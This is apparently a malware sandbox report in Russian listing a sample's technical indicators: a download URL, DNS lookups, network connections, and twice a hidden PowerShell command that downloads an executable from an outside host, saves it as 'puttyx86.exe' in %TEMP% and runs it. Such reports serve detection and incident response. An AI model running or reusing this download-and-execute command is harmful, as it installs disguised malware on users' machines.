Техническая информация
- https://d.filebox.moe/pvpogz.exe как %temp%\\puttyx86.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://d.filebox.moe/pvpogz.exe','%TEMP%\\puttyx86.exe') & %TEMP%\\puttyx86.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- 'd.###ebox.moe':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'd.###ebox.moe':443
- DNS ASK d.###ebox.moe
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://d.filebox.moe/pvpogz.exe','%TEMP%\\puttyx86.exe') & %TEMP%\\puttyx86.exe (со скрытым окном)